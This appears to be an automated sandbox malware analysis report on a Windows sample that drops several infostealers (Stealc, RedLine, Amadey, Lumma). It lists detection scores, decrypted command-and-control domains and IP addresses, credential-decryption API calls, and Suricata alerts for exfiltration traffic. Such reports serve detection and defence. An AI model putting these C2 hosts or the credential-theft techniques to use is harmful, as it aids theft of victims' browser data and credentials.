Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\runtime[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Set-up[1].exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\channel3[1].exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\1000238002\Amadeus.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	String decryptor: y1TO5A--QX1

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009E9BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	22_2_009E9BB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F8940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	22_2_009F8940
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009E7280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	22_2_009E7280
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EC660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	22_2_009EC660
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009E9B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	22_2_009E9B10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C866C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	22_2_6C866C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	22_2_6C9BA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9B44C0 PK11_PubEncrypt,	22_2_6C9B44C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C984420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	22_2_6C984420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9B4440 PK11_PrivDecrypt,	22_2_6C9B4440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	22_2_6CA025B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C99E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	22_2_6C99E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	22_2_6C9BA650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C998670 PK11_ExportEncryptedPrivKeyInfo,	22_2_6C998670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	22_2_6C9DA730

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.8.206:443 -> 192.168.2.8:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49830 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000016.00000002.2301366452.000000006C8CD000.00000002.00000001.01000000.0000001A.sdmp, svchost015.exe, 00000019.00000002.2566561207.000000006C02D000.00000002.00000001.01000000.0000001A.sdmp, mozglue[1].dll.25.dr, mozglue[1].dll.22.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.22.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.22.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr
Source:	Binary string: c:\rje\tg\3fl4\obj\Re\ease\etf.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000001E.00000000.2408541214.00000000001B2000.00000002.00000001.01000000.0000001F.sdmp, runtime.exe.32.dr
Source:	Binary string: BitLockerToGo.pdb source: Amadeus.exe, 0000001B.00000002.2558300880.0000000001894000.00000004.00001000.00020000.00000000.sdmp, Amadeus.exe, 00000026.00000002.2741849843.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdbb source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 0000001E.00000000.2408541214.00000000001B2000.00000002.00000001.01000000.0000001F.sdmp, runtime.exe.32.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.22.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.25.dr
Source:	Binary string: c:\rje\tg\bj\Re\ease\gqa.pdb source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000016.00000002.2301366452.000000006C8CD000.00000002.00000001.01000000.0000001A.sdmp, svchost015.exe, 00000019.00000002.2566561207.000000006C02D000.00000002.00000001.01000000.0000001A.sdmp, mozglue[1].dll.25.dr, mozglue[1].dll.22.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: Amadeus.exe, 0000001B.00000002.2558300880.0000000001894000.00000004.00001000.00020000.00000000.sdmp, Amadeus.exe, 00000026.00000002.2741849843.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.22.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0041B6DA FindFirstFileExW,	14_2_0041B6DA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_004AD9FD FindFirstFileExW,	19_2_004AD9FD
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0065D9FD FindFirstFileExW,	20_2_0065D9FD
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EBCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	22_2_009EBCB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009ED8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_009ED8C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EF4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009EF4F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F39B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_009F39B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EE270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	22_2_009EE270
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F43F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009F43F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009E1710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EDC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_009EDC50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F4050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	22_2_009F4050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009F33C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	22_2_009F33C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009EEB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	22_2_009EEB60

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E0938Fh	11_2_06E08C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E0CF48h	11_2_06E0CA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E08B8Dh	11_2_06E088B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	11_2_06E03158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	11_2_06E02E88

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49714 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49714 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49711 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49713 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.8:49714
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49716 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49723 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.8:49714
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49728 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49726 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49722 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49722 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.8:49722
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.8:49722
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49726 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.8:49726
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49726 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.8:49726
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49726 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49739 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49745 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 91.202.233.158:80 -> 192.168.2.8:49751
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 91.202.233.158:80 -> 192.168.2.8:49751
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49754 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49766 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49764 -> 195.133.48.136:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49768 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49760 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49775 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.8:49774
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49780 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49784 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.8:62967 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055490 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) : 192.168.2.8:49788 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49790 -> 185.215.113.19:80
